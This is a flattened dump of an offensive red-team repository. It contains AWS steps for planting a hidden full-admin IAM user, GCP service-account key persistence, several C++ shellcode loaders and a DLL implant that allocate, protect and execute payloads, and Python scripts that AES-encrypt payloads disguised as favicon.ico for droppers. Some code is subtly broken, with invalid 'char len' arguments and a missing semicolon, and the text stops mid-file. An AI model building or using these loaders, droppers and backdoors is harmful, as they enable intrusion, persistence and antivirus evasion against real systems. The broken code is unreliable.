│ │ │ │ ├── runas.iobj │ │ │ │ ├── runas.ipdb │ │ │ │ ├── runas.log │ │ │ │ ├── runas.tlog │ │ │ │ ├── CL.command.1.tlog │ │ │ │ ├── CL.read.1.tlog │ │ │ │ ├── CL.write.1.tlog │ │ │ │ ├── link.command.1.tlog │ │ │ │ ├── link.read.1.tlog │ │ │ │ ├── link.write.1.tlog │ │ │ │ └── runas.lastbuildstate │ │ │ │ └── vc142.pdb │ │ ├── token │ │ │ ├── token.cpp │ │ │ ├── token.vcxproj │ │ │ ├── token.vcxproj.filters │ │ │ ├── token.vcxproj.user │ │ │ └── x64 │ │ │ │ └── Release │ │ │ │ ├── token.exe.recipe │ │ │ │ ├── token.iobj │ │ │ │ ├── token.ipdb │ │ │ │ ├── token.log │ │ │ │ ├── token.tlog │ │ │ │ ├── CL.command.1.tlog │ │ │ │ ├── CL.read.1.tlog │ │ │ │ ├── CL.write.1.tlog │ │ │ │ ├── link.command.1.tlog │ │ │ │ ├── link.read.1.tlog │ │ │ │ ├── link.write.1.tlog │ │ │ │ └── token.lastbuildstate │ │ │ │ └── vc142.pdb │ │ └── wellknownsids │ │ │ ├── wellknownsids.cpp │ │ │ ├── wellknownsids.vcxproj │ │ │ ├── wellknownsids.vcxproj.filters │ │ │ ├── wellknownsids.vcxproj.user │ │ │ └── x64 │ │ │ ├── Debug │ │ │ ├── vc142.idb │ │ │ ├── vc142.pdb │ │ │ ├── wellknownsids.log │ │ │ └── wellknownsids.tlog │ │ │ │ ├── CL.command.1.tlog │ │ │ │ ├── CL.read.1.tlog │ │ │ │ ├── CL.write.1.tlog │ │ │ │ ├── link-cvtres.read.1.tlog │ │ │ │ ├── link-cvtres.write.1.tlog │ │ │ │ ├── link-rc.read.1.tlog │ │ │ │ ├── link-rc.write.1.tlog │ │ │ │ ├── link.command.1.tlog │ │ │ │ ├── link.read.1.tlog │ │ │ │ ├── link.write.1.tlog │ │ │ │ ├── unsuccessfulbuild │ │ │ │ └── wellknownsids.lastbuildstate │ │ │ └── Release │ │ │ ├── vc142.pdb │ │ │ ├── wellknownsids.exe.recipe │ │ │ ├── wellknownsids.iobj │ │ │ ├── wellknownsids.ipdb │ │ │ ├── wellknownsids.log │ │ │ └── wellknownsids.tlog │ │ │ ├── CL.command.1.tlog │ │ │ ├── CL.read.1.tlog │ │ │ ├── CL.write.1.tlog │ │ │ ├── link.command.1.tlog │ │ │ ├── link.read.1.tlog │ │ │ ├── link.write.1.tlog │ │ │ └── wellknownsids.lastbuildstate │ └── WoW64 │ │ ├── aesencryptstring.py │ │ ├── compile.bat │ │ ├── execute64.bin │ │ ├── implant.cpp │ │ └── wownative.bin └── readme.md ├── covenant.md ├── hashcracking.md ├── infrastructure ├── bufferoverflow.md ├── bufferoverflow │ ├── exploit.py │ └── fuzzing.py ├── enumeration.md ├── exploitation.md ├── pivoting.md ├── privesc_linux.md ├── privesc_windows.md └── readme.md ├── metasploit.md ├── misc.md ├── python_dependancies.md ├── web.md ├── windows-ad ├── Domain-Enumeration.md ├── Domain-Persistence.md ├── Domain-Privilege-Escalation.md ├── Evasion.md ├── Host-Persistence.md ├── Host-Reconnaissance.md ├── Initial-Access.md ├── Lateral-Movement.md ├── Post-Exploitation.md ├── linux_ad.md ├── readme.md └── relaying.md └── windows_security.md /cloud/aws/lateral-movement.md: -------------------------------------------------------------------------------- 1 | # Lateral movement 2 | ## Index 3 | * [Gain GUI Acess](#Gain-GUI-Access) 4 | 5 | ## Gain GUI Access 6 | #### Copy and save the following 7 | - as ```admin-policy.json``` 8 | ``` 9 | { 10 | "Version": "2012-10-17", 11 | "Statement": [ 12 | { 13 | "Sid": "NotABackdoor", 14 | "Effect": "Allow", 15 | "Action": "*", 16 | "Resource": "*" 17 | } 18 | ] 19 | } 20 | ``` 21 | 22 | #### Create a new user that will give gui access to 23 | - After gaining administrator 24 | - Note down the ARN 25 | ``` 26 | sudo aws iam create-user --user-name gui-user --profile 27 | ``` 28 | 29 | #### Attach the policy to the new user 30 | ``` 31 | sudo aws iam put-user-policy --user-name gui-user --policy-name VisualAid --policy-document file://admin-policy.json --profile 32 | ``` 33 | 34 | #### Set password for the user 35 | ``` 36 | sudo aws iam create-login-profile --user-name gui-user --password "GUIAccessTime1" --profile 37 | ``` 38 | 39 | #### Login with account ID 40 | - Part from ARN 41 | - ```https://.signin.aws.amazon.com/console/``` 42 | -------------------------------------------------------------------------------- /cloud/aws/post-exploitation.md: -------------------------------------------------------------------------------- 1 | # Post exploitation 2 | ## Data harvesting 3 | -------------------------------------------------------------------------------- /cloud/aws/readme.md: -------------------------------------------------------------------------------- 1 | # Amazon Web Services pentesting cheatsheet 2 | ## Index 3 | * [General](#General) 4 | * [Authenticated enumeration](authenticated-enumeration.md ) 5 | * [Privilege Escalation](privilege-escalation.md) 6 | * [Lateral Movement](lateral-movement.md) 7 | * [Persistence](persistence.md) 8 | * [Post Exploitation](post-exploitation.md) 9 | 10 | ## General 11 | ### Tools 12 | - https://github.com/RhinoSecurityLabs/pacu 13 | 14 | ### Pacu 15 | 16 | #### Install Pacu 17 | ``` 18 | sudo apt-get install python3-pip 19 | git clone https://github.com/RhinoSecurityLabs/pacu 20 | cd pacu 21 | sudo bash install.sh 22 | ``` 23 | 24 | #### Import AWS keys for a specific profile 25 | ```bash 26 | import_keys 27 | ``` 28 | 29 | #### Detect if keys are honey token keys 30 | ``` 31 | run iam__detect_honeytokens 32 | ``` 33 | 34 | #### Enumerate account information and permissions 35 | ``` 36 | run iam__enum_users_roles_policies_groups 37 | run iam__enum_permissions 38 | whoami 39 | ``` 40 | 41 | #### Check for privilege escalation 42 | ```bash 43 | run iam__privesc_scan 44 | ``` 45 | 46 | 47 | -------------------------------------------------------------------------------- /cloud/gc/persistence.md: -------------------------------------------------------------------------------- 1 | # Persistence 2 | - App passwords 3 | - Good way to get around 2fa but are revoked on password changes 4 | - Backup codes 5 | - Generate one-time passcodes that can be used for 2-step verifictation 6 | - API and service account tokens 7 | - Create a new project on cloud.google.com 8 | - Enable API access with scopes set to any resources you can 9 | 10 | ## Service Account 11 | #### Create a new key for specified service account. 12 | - Saves credentials in `key.json` 13 | ``` 14 | gcloud iam service-accounts keys create key.json --iam-account 15 | ``` 16 | 17 | #### Authenticate with key file 18 | ``` 19 | gcloud auth activate-service-account --key-file key.json 20 | ``` 21 | -------------------------------------------------------------------------------- /cloud/gc/readme.md: -------------------------------------------------------------------------------- 1 | # Google Cloud Platform pentesting cheatsheet 2 | ## Index 3 | * [General](#General) 4 | * [Authenticated enumeration](authenticated-enumeration.md ) 5 | * [Exploitation & Privilege Escalation](privilege-escalation.md) 6 | * [Lateral-movement](lateral-movement.md) 7 | * [Persistence](persistence.md) 8 | * [Post Exploitation](post-exploitation.md) 9 | * [Persistence](persistence.md) 10 | 11 | ## General 12 | 13 | -------------------------------------------------------------------------------- /coding/cplusplus/readme.md: -------------------------------------------------------------------------------- 1 | # Index 2 | * [General](#General) 3 | * [Cheatsheet](cheatsheet.md) 4 | * [Windows Security Code Samples](Windows_Security/) 5 | 6 | 7 | # General 8 | -------------------------------------------------------------------------------- /coding/csharp/readme.md: -------------------------------------------------------------------------------- 1 | # Index 2 | * [General](#General) 3 | * [Cheatsheet](cheatsheet.md) 4 | 5 | 6 | # General 7 | -------------------------------------------------------------------------------- /coding/projects/Basics/implantDLL/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /D_USRDLL /D_WINDLL implantDLL.cpp /MT /link /DLL /OUT:implant.dll 4 | -------------------------------------------------------------------------------- /coding/projects/Basics/implantDLL/implantDLL.cpp: -------------------------------------------------------------------------------- 1 | // author: reenz0h(twitter : @SEKTOR7net) 2 | 3 | #include 4 | #pragma comment (lib, "user32.lib") 5 | 6 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { 7 | 8 | switch (ul_reason_for_call) { 9 | case DLL_PROCESS_ATTACH: 10 | case DLL_PROCESS_DETACH: 11 | case DLL_THREAD_ATTACH: 12 | case DLL_THREAD_DETACH: 13 | break; 14 | } 15 | return TRUE; 16 | } 17 | 18 | extern "C" { 19 | __declspec(dllexport) BOOL WINAPI RunME(void) { 20 | 21 | MessageBox( 22 | NULL, 23 | "Example DLL!", 24 | "MessageBox", 25 | MB_OK 26 | ); 27 | 28 | return TRUE; 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /coding/projects/Basics/implantPE/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /coding/projects/Basics/implantPE/implant.cpp: -------------------------------------------------------------------------------- 1 | // author: reenz0h(twitter : @SEKTOR7net) 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | int main(void) { 9 | 10 | printf("Example PE\n"); 11 | 12 | getchar(); 13 | 14 | return 0; 15 | } 16 | -------------------------------------------------------------------------------- /coding/projects/Basics/implant_data/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /coding/projects/Basics/implant_data/implant.cpp: -------------------------------------------------------------------------------- 1 | // author: reenz0h(twitter : @SEKTOR7net) 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | unsigned char payl[] = { }; 9 | unsigned int len = sizeof(payl); 10 | 11 | int main(void) { 12 | 13 | void * exec_mem; 14 | BOOL rv; 15 | HANDLE th; 16 | DWORD oldprotect = 0; 17 | 18 | // Allocate memory buffer for payload 19 | exec_mem = VirtualAlloc(0, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 20 | 21 | // Copy paylload to new buffer 22 | RtlMoveMemory(exec_mem, payl, len); 23 | 24 | // Set new buffer as executable 25 | rv = VirtualProtect(exec_mem, len, PAGE_EXECUTE_READ, &oldprotect); 26 | 27 | // Run the payload 28 | if ( rv != 0 ) { 29 | th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); 30 | WaitForSingleObject(th, -1); 31 | } 32 | 33 | return 0; 34 | } -------------------------------------------------------------------------------- /coding/projects/Basics/implant_rdata/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /coding/projects/Basics/implant_rdata/implant.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | const unsigned char payl[] = { } 7 | unsigned int len = sizeof(payl); 8 | 9 | int main(void) { 10 | 11 | void * exec_mem; 12 | BOOL rv; 13 | HANDLE th; 14 | DWORD oldprotect = 0; 15 | 16 | // Allocate memory buffer for payload 17 | exec_mem = VirtualAlloc(0, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 18 | 19 | // Copy paylload to new buffer 20 | RtlMoveMemory(exec_mem, payl, len); 21 | 22 | // Set new buffer as executable 23 | rv = VirtualProtect(exec_mem, len, PAGE_EXECUTE_READ, &oldprotect); 24 | 25 | // Run the payload 26 | if ( rv != 0 ) { 27 | th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); 28 | WaitForSingleObject(th, -1); 29 | } 30 | 31 | return 0; 32 | } -------------------------------------------------------------------------------- /coding/projects/Basics/implant_src/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | rc resources.rc 4 | cvtres /MACHINE:x64 /OUT:resources.o resources.res 5 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o -------------------------------------------------------------------------------- /coding/projects/Basics/implant_src/implant.cpp: -------------------------------------------------------------------------------- 1 | // author: reenz0h(twitter : @SEKTOR7net) 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "resources.h" 8 | 9 | int main(void) { 10 | 11 | void * exec_mem; 12 | BOOL rv; 13 | HANDLE th; 14 | DWORD oldprotect = 0; 15 | HGLOBAL resHandle = NULL; 16 | HRSRC res; 17 | 18 | unsigned char * payl; 19 | unsigned int len; 20 | 21 | // Extract payload from resources section 22 | res = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA); 23 | resHandle = LoadResource(NULL, res); 24 | payl = (char *) LockResource(resHandle); 25 | len = SizeofResource(NULL, res); 26 | 27 | // Allocate some memory buffer for payload 28 | exec_mem = VirtualAlloc(0, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 29 | 30 | // Copy payload to new memory buffer 31 | RtlMoveMemory(exec_mem, payl, len); 32 | 33 | // Set the buffer executable 34 | rv = VirtualProtect(exec_mem, len, PAGE_EXECUTE_READ, &oldprotect); 35 | 36 | // Run the payload 37 | if ( rv != 0 ) { 38 | th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); 39 | WaitForSingleObject(th, -1); 40 | } 41 | 42 | return 0; 43 | } -------------------------------------------------------------------------------- /coding/projects/Basics/implant_src/resources.h: -------------------------------------------------------------------------------- 1 | #define FAVICON_ICO 100 2 | -------------------------------------------------------------------------------- /coding/projects/Basics/implant_src/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | FAVICON_ICO RCDATA calc.ico 4 | -------------------------------------------------------------------------------- /coding/projects/Basics/implant_text/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /coding/projects/Basics/implant_text/implant.cpp: -------------------------------------------------------------------------------- 1 | // author: reenz0h(twitter : @SEKTOR7net) 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | int main(void) { 9 | 10 | void * exec_mem; 11 | BOOL rv; 12 | HANDLE th; 13 | DWORD oldprotect = 0; 14 | 15 | unsigned char payl[] = { }; 16 | unsigned int len = sizeof(payl); 17 | 18 | // Allocate memory buffer for payload 19 | exec_mem = VirtualAlloc(0, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 20 | 21 | // Copy payload to new buffer 22 | RtlMoveMemory(exec_mem, payl, len); 23 | 24 | // Set new buffer as executable 25 | rv = VirtualProtect(exec_mem, len, PAGE_EXECUTE_READ, &oldprotect); 26 | 27 | // Run the payload 28 | if ( rv != 0 ) { 29 | th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); 30 | WaitForSingleObject(th, -1); 31 | } 32 | 33 | return 0; 34 | } -------------------------------------------------------------------------------- /coding/projects/Basics/implant_text2/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /coding/projects/Basics/implant_text2/implant.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #pragma section(".text") 7 | __declspec(allocate(".text")) const unsigned char payl[] = { 8 | 9 | }; 10 | 11 | int main(void) { 12 | 13 | void * exec_mem; 14 | BOOL rv; 15 | HANDLE th; 16 | DWORD oldprotect = 0; 17 | 18 | unsigned int len = sizeof(payl); 19 | 20 | // Allocate memory buffer for payload 21 | exec_mem = VirtualAlloc(0, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 22 | 23 | // Copy payload to new buffer 24 | RtlMoveMemory(exec_mem, payl, len); 25 | 26 | // Set new buffer as executable 27 | rv = VirtualProtect(exec_mem, len, PAGE_EXECUTE_READ, &oldprotect); 28 | 29 | // Run the payload 30 | if ( rv != 0 ) { 31 | th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); 32 | WaitForSingleObject(th, -1); 33 | } 34 | 35 | return 0; 36 | } -------------------------------------------------------------------------------- /coding/projects/Code_Injection/AsyncCalls/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp *.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE 4 | del *.obj -------------------------------------------------------------------------------- /coding/projects/Code_Injection/EarlyBird/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp *.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE 4 | del *.obj -------------------------------------------------------------------------------- /coding/projects/Code_Injection/MapView/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp *.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE 4 | del *.obj -------------------------------------------------------------------------------- /coding/projects/Code_Injection/Remote_Process/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /coding/projects/Code_Injection/Remote_Process_DLL/compileDLL.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /O2 /D_USRDLL /D_WINDLL implantDLL.cpp implantDLL.def /MT /link /DLL /OUT:implantDLL.dll -------------------------------------------------------------------------------- /coding/projects/Code_Injection/Remote_Process_DLL/compileInjector.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /TcinjectDLL.cpp /link /OUT:injectDLL.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /coding/projects/Code_Injection/Remote_Process_DLL/implantDLL.cpp: -------------------------------------------------------------------------------- 1 | // author: reenz0h(twitter : @SEKTOR7net) 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | unsigned char payl[] = { }; 9 | unsigned int len = sizeof(payl); 10 | 11 | extern __declspec(dllexport) int Go(void); 12 | int Go(void) { 13 | 14 | void * exec_mem; 15 | BOOL rv; 16 | HANDLE th; 17 | DWORD oldprotect = 0; 18 | 19 | exec_mem = VirtualAlloc(0, char len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 20 | 21 | RtlMoveMemory(exec_mem, char payl, char len); 22 | 23 | rv = VirtualProtect(exec_mem, char len, PAGE_EXECUTE_READ, &oldprotect); 24 | 25 | if ( rv != 0 ) { 26 | th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); 27 | WaitForSingleObject(th, 0); 28 | } 29 | return 0; 30 | } 31 | 32 | BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved ) { 33 | 34 | switch ( fdwReason ) { 35 | case DLL_PROCESS_ATTACH: 36 | Go(); 37 | break; 38 | case DLL_THREAD_ATTACH: 39 | break; 40 | case DLL_THREAD_DETACH: 41 | break; 42 | case DLL_PROCESS_DETACH: 43 | break; 44 | } 45 | return TRUE; 46 | } -------------------------------------------------------------------------------- /coding/projects/Code_Injection/Remote_Process_Variatons/aesencryptfile.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import sys 3 | from Crypto.Cipher import AES 4 | from Crypto.Util.Padding import pad 5 | from os import urandom 6 | 7 | import hashlib 8 | 9 | # AES key 10 | KEY = urandom(16) 11 | 12 | # Use a static key for testing 13 | #KEY = b'AAAAAAAABBBBBBBB' 14 | 15 | def encrypt_AES(plaintext, key): 16 | k = hashlib.sha256(key).digest() 17 | iv = b'\x00' * 16 18 | plaintext = pad(plaintext, AES.block_size) 19 | cipher = AES.new(k, AES.MODE_CBC, iv) 20 | return cipher.encrypt(plaintext) 21 | 22 | 23 | def main(): 24 | try: 25 | payload = open(sys.argv[1], "rb").read() 26 | except: 27 | print("File argument needed! %s " % sys.argv[0]) 28 | sys.exit() 29 | 30 | # encrypt payload and print the random AES key 31 | ct = encrypt_AES(payload, KEY) 32 | print('char AESkey[] = { 0x' + ', 0x'.join(hex(ord(chr(x)))[2:] for x in KEY) + ' };') 33 | 34 | # save payload to favicon.ico 35 | with open('favicon.ico', 'wb') as f: 36 | f.write(ct) 37 | 38 | if __name__ == '__main__': 39 | main() -------------------------------------------------------------------------------- /coding/projects/Code_Injection/Remote_Process_Variatons/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | rc resources.rc 3 | cvtres /MACHINE:x64 /OUT:resources.o resources.res 4 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp *.cpp /link /SUBSYSTEM:WINDOWS /MACHINE:x64 /OUT:implant.exe resources.o 5 | del *.obj -------------------------------------------------------------------------------- /coding/projects/Code_Injection/Remote_Process_Variatons/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Code_Injection/Remote_Process_Variatons/favicon.ico -------------------------------------------------------------------------------- /coding/projects/Code_Injection/Remote_Process_Variatons/helpers.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | HMODULE WINAPI hlpGetModuleHandle(LPCWSTR sModuleName); 7 | FARPROC WINAPI hlpGetProcAddress(HMODULE hMod, char * sProcName); -------------------------------------------------------------------------------- /coding/projects/Code_Injection/Remote_Process_Variatons/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Code_Injection/Remote_Process_Variatons/implant.exe -------------------------------------------------------------------------------- /coding/projects/Code_Injection/Remote_Process_Variatons/msgbox64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Code_Injection/Remote_Process_Variatons/msgbox64.bin -------------------------------------------------------------------------------- /coding/projects/Code_Injection/Remote_Process_Variatons/resources.h: -------------------------------------------------------------------------------- 1 | #define FAVICON_ICO 100 2 | -------------------------------------------------------------------------------- /coding/projects/Code_Injection/Remote_Process_Variatons/resources.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Code_Injection/Remote_Process_Variatons/resources.o -------------------------------------------------------------------------------- /coding/projects/Code_Injection/Remote_Process_Variatons/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | FAVICON_ICO RCDATA favicon.ico 4 | -------------------------------------------------------------------------------- /coding/projects/Code_Injection/Remote_Process_Variatons/resources.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Code_Injection/Remote_Process_Variatons/resources.res -------------------------------------------------------------------------------- /coding/projects/Code_Injection/ThreadContext/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp *.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE 4 | del *.obj -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_Explorer_NoImports/aesencryptfile.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import sys 3 | from Crypto.Cipher import AES 4 | from Crypto.Util.Padding import pad 5 | from os import urandom 6 | 7 | import hashlib 8 | 9 | # AES key 10 | KEY = urandom(16) 11 | 12 | # Use a static key for testing 13 | #KEY = b'AAAAAAAABBBBBBBB' 14 | 15 | def encrypt_AES(plaintext, key): 16 | k = hashlib.sha256(key).digest() 17 | iv = b'\x00' * 16 18 | plaintext = pad(plaintext, AES.block_size) 19 | cipher = AES.new(k, AES.MODE_CBC, iv) 20 | return cipher.encrypt(plaintext) 21 | 22 | 23 | def main(): 24 | try: 25 | payload = open(sys.argv[1], "rb").read() 26 | except: 27 | print("File argument needed! %s " % sys.argv[0]) 28 | sys.exit() 29 | 30 | # encrypt payload and print the random AES key 31 | ct = encrypt_AES(payload, KEY) 32 | print('char AESkey[] = { 0x' + ', 0x'.join(hex(ord(chr(x)))[2:] for x in KEY) + ' };') 33 | 34 | # save payload to favicon.ico 35 | with open('favicon.ico', 'wb') as f: 36 | f.write(ct) 37 | 38 | if __name__ == '__main__': 39 | main() -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_Explorer_NoImports/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | rc resources.rc 3 | cvtres /MACHINE:x64 /OUT:resources.o resources.res 4 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp *.cpp /link /SUBSYSTEM:WINDOWS /MACHINE:x64 /OUT:implant.exe resources.o 5 | del *.obj -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_Explorer_NoImports/helpers.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | HMODULE WINAPI hlpGetModuleHandle(LPCWSTR sModuleName); 7 | FARPROC WINAPI hlpGetProcAddress(HMODULE hMod, char * sProcName); -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_Explorer_NoImports/resources.h: -------------------------------------------------------------------------------- 1 | #define FAVICON_ICO 100 2 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_Explorer_NoImports/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | FAVICON_ICO RCDATA favicon.ico 4 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_Explorer_PayloadControl/aesencryptfile.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import sys 3 | from Crypto.Cipher import AES 4 | from Crypto.Util.Padding import pad 5 | from os import urandom 6 | 7 | import hashlib 8 | 9 | # AES key 10 | KEY = urandom(16) 11 | 12 | # Use a static key for testing 13 | #KEY = b'AAAAAAAABBBBBBBB' 14 | 15 | def encrypt_AES(plaintext, key): 16 | k = hashlib.sha256(key).digest() 17 | iv = b'\x00' * 16 18 | plaintext = pad(plaintext, AES.block_size) 19 | cipher = AES.new(k, AES.MODE_CBC, iv) 20 | return cipher.encrypt(plaintext) 21 | 22 | 23 | def main(): 24 | try: 25 | payload = open(sys.argv[1], "rb").read() 26 | except: 27 | print("File argument needed! %s " % sys.argv[0]) 28 | sys.exit() 29 | 30 | # encrypt payload and print the random AES key 31 | ct = encrypt_AES(payload, KEY) 32 | print('char AESkey[] = { 0x' + ', 0x'.join(hex(ord(chr(x)))[2:] for x in KEY) + ' };') 33 | 34 | # save payload to favicon.ico 35 | with open('favicon.ico', 'wb') as f: 36 | f.write(ct) 37 | 38 | if __name__ == '__main__': 39 | main() -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_Explorer_PayloadControl/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | rc resources.rc 3 | cvtres /MACHINE:x64 /OUT:resources.o resources.res 4 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp *.cpp /link /SUBSYSTEM:WINDOWS /MACHINE:x64 /OUT:implant.exe resources.o 5 | del *.obj -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_Explorer_PayloadControl/helpers.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | HMODULE WINAPI hlpGetModuleHandle(LPCWSTR sModuleName); 7 | FARPROC WINAPI hlpGetProcAddress(HMODULE hMod, char * sProcName); -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_Explorer_PayloadControl/resources.h: -------------------------------------------------------------------------------- 1 | #define FAVICON_ICO 100 2 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_Explorer_PayloadControl/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | FAVICON_ICO RCDATA favicon.ico 4 | -------------------------------------------------------------------------------- /coding/projects/Dropper_AES_Favicon_MapView_Explorer/aesencryptfile.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import sys 3 | from Crypto.Cipher import AES 4 | from Crypto.Util.Padding import pad 5 | from os import urandom 6 | 7 | import hashlib 8 | 9 | # AES key 10 | KEY = urandom(16) 11 | 12 | # Use a static key for testing 13 | #KEY = b'AAAAAAAABBBBBBBB' 14 | 15 | def encrypt_AES(plaintext, key): 16 | k = hashlib.sha256(key).digest() 17 | iv = b'\x00' * 16 18 | plaintext = pad(plaintext, AES.block_size) 19 | cipher = AES.new(k, AES.MODE_CBC, iv) 20 | return cipher.encrypt(plaintext) 21 | 22 | 23 | def main(): 24 | try: 25 | payload = open(sys.argv[1], "rb").read() 26 | except: 27 | print("File argument needed! %s " % sys.argv[0]) 28 | sys.exit() 29 | 30 | # encrypt payload and print the random AES key 31 | ct = encrypt_AES(payload, KEY) 32 | print('char AESkey[] = { 0x' + ', 